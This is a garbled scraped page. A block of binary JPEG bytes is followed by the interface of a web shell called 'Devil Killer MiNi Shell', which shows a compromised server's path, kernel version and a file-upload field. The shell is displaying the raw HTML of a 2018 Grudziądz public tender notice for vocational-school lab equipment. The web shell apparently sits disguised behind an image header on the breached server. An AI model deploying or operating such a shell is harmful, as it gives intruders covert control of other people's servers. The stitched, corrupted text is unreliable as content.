JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180801/597572-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 597572-N-2018 z dnia 2018-08-01 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Miasto Grudziądz</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem trzech pracowni w Centrum Kształcenia Praktycznego w Grudziądzu w ramach projektu ,,Modernizacja infrastruktury edukacyjnej szkolnictwa zawodowego miasta Grudziądza - etap II"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Modernizacja infrastruktury edukacyjnej szkolnictwa zawodowego Miasta Grudziądza - Etap II współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2014-2020</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Miasto Grudziądz</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">87111883300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Ratuszowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">86300 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Grudziądz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">kujawsko-pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">564 510 233</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">bzp@um.grudziadz.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">564 510 233</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.grudziadz.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.grudziadz.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.grudziadz.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty składa się pod rygorem nieważności w formie pisemnej.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Biuro Zamówień Publicznych Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, 86-300 Grudziądz</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem trzech pracowni w Centrum Kształcenia Praktycznego w Grudziądzu w ramach projektu ,,Modernizacja infrastruktury edukacyjnej szkolnictwa zawodowego miasta Grudziądza - etap II"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">FE.042.9.6.2016</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">wszystkie części</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Część IDostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem pracowni elektrotechniki i mechatroniki samochodowej (szczegółowy opis przedmiotu zamówienia, w tym opis wymagań technicznych i funkcjonalnych dotyczący zamawianego sprzętu i wyposażenia zawiera załącznik do SIWZ, stanowiący jednocześnie wzór formularza cenowego).1.1 Samochód osobowy - 1 szt., gwarancja minimum 2 lata, 1.2 Zestaw panelowy ,,Oświetlenie pojazdu samochodowego" - 1 szt., gwarancja minimum 2 lata,1.3 Zestaw panelowy ,,Podstawy elektroniki i elektrotechniki pojazdowej" - 1 szt., gwarancja minimum 2 lata,1.4 Tester potencjometrów i czujników podciśnienia - 1 szt., gwarancja minimum 2 lata,1.5 Tester sondy lambda - 1 szt., gwarancja minimum 2 lata,1.6 Tester czujników Halla - 1 szt., gwarancja minimum 2 lata,1.7 Tester impulsu wtrysku - 1 szt., gwarancja minimum 2 lata,1.8 Symulator czujników temperatury ,,PCT" - 1 szt., gwarancja minimum 2 lata,1.9 Tester regulatorów napięcia 12/24 V - 1 szt., gwarancja minimum 2 lata,1.10 Przystawka PWM-COM - 1 szt., gwarancja minimum 2 lata,1.11 Stanowisko testowania sondy lambda - 1 szt., gwarancja minimum 2 lata,1.12 Tester przepływomierzy powietrza - 1 szt., gwarancja minimum 2 lata,1.13 Tester mechanizmów wykonawczych - 1 szt., gwarancja minimum 2 lata,1.14 Tester modułów zapłonu - 1 szt., gwarancja minimum 2 lata,1.15 Tester pomp paliwa TPP1 - 1 szt., gwarancja minimum 2 lata.Część IIDostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem pracowni spawalnictwa i obróbki cieplnej (szczegółowy opis przedmiotu zamówienia, w tym opis wymagań technicznych i funkcjonalnych dotyczący zamawianego sprzętu i wyposażenia zawiera załącznik do SIWZ, stanowiący jednocześnie wzór formularza cenowego).2.1 Spawarka MAG/MIG - 5 szt., gwarancja minimum 2 lata,2.2 Uchwyt spawalniczy - 4 szt., gwarancja minimum 2 lata,2.3 Uchwyt spawalniczy - 1 szt., gwarancja minimum 2 lata,2.4 Uchwyt spawalniczy do elektrody - 5 szt., gwarancja minimum 2 lata,2.5 Reduktor Argon/CO2 - 10 szt., gwarancja minimum 2 lata,2.6 Podgrzewacz gazu - 5 szt., gwarancja minimum 2 lata,2.7 Wąż gazowy - 1 szt., gwarancja minimum 2 lata,2.8 Młotek spawalniczy - 10 szt., gwarancja minimum 2 lata,2.9 Uchwyt magnetyczny uziemienia - 10 szt., gwarancja minimum 2 lata,2.10 Spawarka MAG/MIG - 1 szt., gwarancja minimum 2 lata,2.11 Łuski M36 - 10 szt., gwarancja minimum 2 lata,2.12 Końcówki prądowe - 100 szt., gwarancja minimum 2 lata,2.13 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.14 Stół spawalniczy - 1 szt., gwarancja minimum 2 lata,2.15 Zestaw oprzyrządowania stołu spawalniczego - 1 szt., gwarancja minimum 2 lata,2.16 Spawarka inwertorowa - 1 szt., gwarancja minimum 2 lata,2.17 Elektroda - 1 szt., gwarancja minimum 2 lata,2.18 Elektroda - 1 szt., gwarancja minimum 2 lata,2.19 Suszarka do elektrod - 1 szt., gwarancja minimum 2 lata,2.20 Przecinarka plazmowa - 1 szt., gwarancja minimum 2 lata,2.21 Zespół filtra powietrza - 1 szt., gwarancja minimum 2 lata,2.22 Zestaw cyrkla w kasecie - 1 szt., gwarancja minimum 2 lata,2.23 Cyrkiel standardowy - 1 szt., gwarancja minimum 2 lata,2.24 Cyrkiel z magnesem - 1 szt., gwarancja minimum 2 lata,2.25 Prowadnik prostoliniowy z magnesem - 1 szt., gwarancja minimum 2 lata,2.26 Elektrody do cięcia - 10 szt., gwarancja minimum 2 lata,2.27 Dysze - 10 szt., gwarancja minimum 2 lata,2.28 Rękawice spawalnicze - 10 par, gwarancja minimum 2 lata,2.29 Fartuchy spawalnicze - 10 szt., gwarancja minimum 2 lata,2.30 Tarcze spawalnicze - 10 szt., gwarancja minimum 2 lata,2.31 Przyłbica samościemniająca - 5 szt., gwarancja minimum 2 lata,2.32 Przyłbica samościemniająca z nawiewem - 1 szt., gwarancja minimum 2 lata,2.33 Szczotki stalowe - 10 szt., gwarancja minimum 2 lata,2.34 Filtry spawalnicze - 40 szt., gwarancja minimum 2 lata,2.35 Okulary ochronne - 10 szt., gwarancja minimum 2 lata,2.36 Wózek ręczny do przewożenia butli - 1 szt., gwarancja minimum 2 lata,2.37 Szlifierka kątowa 125 - 5 szt., gwarancja minimum 2 lata,2.38 Szafka narzędziowa z wyposażeniem - 1 szt., gwarancja minimum 2 lata,2.39 Szlifierka stołowa - 1 szt., gwarancja minimum 2 lata,2.40 Szlifierka stołowa dwutarczowa - 1 szt., gwarancja minimum 2 lata,2.41 Szlifierka do ostrzenia elektrod wolframowych - 1 szt., gwarancja minimum 2 lata,2.42 Tarcze szlifierskie - 1 opakowanie, gwarancja minimum 2 lata,2.43 Spoinomierz MS1 - 5 szt., gwarancja minimum 2 lata,2.44 Termokredki - 1 komplet, gwarancja minimum 2 lata,2.45 Pirometr - 1 szt., gwarancja minimum 2 lata,2.46 Środki antyodpryskowe - 10 szt., gwarancja minimum 2 lata,2.47 Pasta do dysz antyodpryskowa - 10 szt., gwarancja minimum 2 lata,2.48 Ceramic spray antyodpryskowy - 10 szt., gwarancja minimum 2 lata,2.49 Zmywacz do aluminium - 1 szt., gwarancja minimum 2 lata,2.50 Pasta do trawienia - 2 szt., gwarancja minimum 2 lata,2.51 Pędzel do pasty do trawienia - 4 szt., gwarancja minimum 2 lata,2.52 Penetrant - 5 szt., gwarancja minimum 2 lata,2.53 Zmywacz - 5 szt., gwarancja minimum 2 lata,2.54 Wywoływacz - 5 szt., gwarancja minimum 2 lata,2.55 Penetrant magnetyczny - 5 szt., gwarancja minimum 2 lata,2.56 Zmywacz magnetyczny - 5 szt., gwarancja minimum 2 lata,2.57 Wywoływacz magnetyczny - 5 szt., gwarancja minimum 2 lata,2.58 Podkładki ceramiczne - 1 komplet, gwarancja minimum 2 lata,2.59 Spawarka TIG AC/DC 300A - 5 szt., gwarancja minimum 2 lata,2.60 Uchwyt spawalniczy - 5 szt., gwarancja minimum 2 lata,2.61 Przewód masowy - 5 szt., gwarancja minimum 2 lata,2.62 Chłodnica - 5 szt., gwarancja minimum 2 lata,2.63 Tulejki zaciskowe - 1 komplet, gwarancja minimum 2 lata,2.64 Korek uchwytu - 10 szt., gwarancja minimum 2 lata,2.65 Elektrody wolframowe - 30 opakowań, gwarancja minimum 2 lata,2.66 Elektrody wolframowe - 30 opakowań, gwarancja minimum 2 lata,2.67 Elektrody wolframowe - 30 opakowań, gwarancja minimum 2 lata,2.68 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.69 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.70 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.71 Zestaw palników uniwersalnych do cięcia i spawania - 2 szt., gwarancja minimum 2 lata,2.72 Palnik do lutowania - 2 szt., gwarancja minimum 2 lata,2.73 Wąż tlenowy - 1 szt., gwarancja minimum 2 lata,2.74 Wąż acetylenowy - 1 szt., gwarancja minimum 2 lata,2.75 Reduktor tlenu - 1 szt., gwarancja minimum 2 lata,2.76 Reduktor acetylenu - 1 szt., gwarancja minimum 2 lata,2.77 Końcówka na wąż tlenowy z nakrętką - 1 szt., gwarancja minimum 2 lata,2.78 Końcówka na wąż acetylenowy z nakrętką - 1 szt., gwarancja minimum 2 lata,2.79 Bezpiecznik przypalnikowy do tlenu - 1 szt., gwarancja minimum 2 lata,2.80 Bezpiecznik przypalnikowy do acetylenu - 1 szt., gwarancja minimum 2 lata,2.81 Bezpiecznik przyreduktorowy do tlenu - 1 szt., gwarancja minimum 2 lata,2.82 Bezpiecznik przyreduktorowy do acetylenu - 1 szt., gwarancja minimum 2 lata,2.83 Szybkozłączka do tlenu - 1 szt., gwarancja minimum 2 lata,2.84 Szybkozłączka do acetylenu - 1 szt., gwarancja minimum 2 lata2.85 Wózek dwubutlowy - 1 szt., gwarancja minimum 2 lata,2.86 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.87 Okulary do spawania gazowego - 5 szt., gwarancja minimum 2 lata,2.88 Rozgałęziacz gazu - 4 szt., gwarancja minimum 2 lata,2.89 Spoiwo do lutowania - 1 szt., gwarancja minimum 2 lata,2.90 Pasta lutownicza - 2 szt., gwarancja minimum 2 lata,2.91 Układ wentylacyjny spawalniczy - 1 szt., gwarancja minimum 2 lata.Część IIIDostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem pracowni obróbki ręcznej, remontu i montażu maszyn i urządzeń (szczegółowy opis przedmiotu zamówienia, w tym opis wymagań technicznych i funkcjonalnych dotyczący zamawianego sprzętu i wyposażenia zawiera załącznik do SIWZ, stanowiący jednocześnie wzór formularza cenowego).3.1 Wiertarka promieniowa - 1 szt., gwarancja minimum 2 lata,3.2 Wiertarka kadłubowa (słupowa) - 1 szt., gwarancja minimum 2 lata,3.3 Szlifierka ostrzałka - 2 szt., gwarancja minimum 2 lata,3.4 Nożyce dźwigniowe ręczne do cięcia blach - 2 szt., gwarancja minimum 2 lata,3.5 Stół ślusarski - 6 szt., gwarancja minimum 2 lata,3.6 Imadło ślusarskie ciężkie - 5 szt., gwarancja minimum 2 lata,3.7 Imadło ślusarskie typu szufladowego - 12 szt., gwarancja minimum 2 lata,3.8 Płyta traserska - 5 szt., gwarancja minimum 2 lata,3.9 Zaginarka do rur - 1 szt., gwarancja minimum 2 lata,3.10 Urządzenie do mycia - 1 szt., gwarancja minimum 2 lata,3.11 Prasa hydrauliczna z oprzyrządowaniem - 1 szt., gwarancja minimum 2 lata,3.12 Prasa montażowa ręczna z oprzyrządowaniem - 3 szt., gwarancja minimum 2 lata,3.13 Wózek narzędziowy 7-szuflad z wyposażeniem we wkładkach narzędziowych min. 266 szt. narzędzi - 3 szt., gwarancja minimum 2 lata,3.14 Zestaw narzędzi ślusarskich - 10 szt., gwarancja minimum 2 lata,3.15 Suwmiarka uniwersalna - 15 szt., gwarancja minimum 2 lata,3.16 Suwmiarka uniwersalna z odczytem cyfrowym - 5 szt., gwarancja minimum 2 lata,3.17 Mikrometry do pomiarów zewnętrznych - 3 komplety, gwarancja minimum 2 lata,3.18 Mikrometry do pomiarów wewnętrznych - 2 komplety, gwarancja minimum 2 lata,3.19 Kątomierz tarczowy z przesuwanym ramieniem - 6 szt., gwarancja minimum 2 lata,3.20 Kątomierz uniwersalny z lupką - 6 szt., gwarancja minimum 2 lata,3.21 Promieniomierz - 5 szt., gwarancja minimum 2 lata,3.22 Sprawdzian grzebieniowy do gwintów - 3 komplety, gwarancja minimum 2 lata,3.23 Klucz dynamometryczny - 2 szt., gwarancja minimum 2 lata,3.24 Szlifierka kątowa - 3 szt., gwarancja minimum 2 lata,3.25 Szlifierka kątowa - 2 szt., gwarancja minimum 2 lata,3.26 Zestaw do zgrzewania polifuzyjnego - 1 szt., gwarancja minimum 2 lata.1.	Wykonawca zobowiązany jest do dostarczenia przedmiotu zamówienia:- własnym transportem i na własny koszt, dokonując rozładunku, montażu, 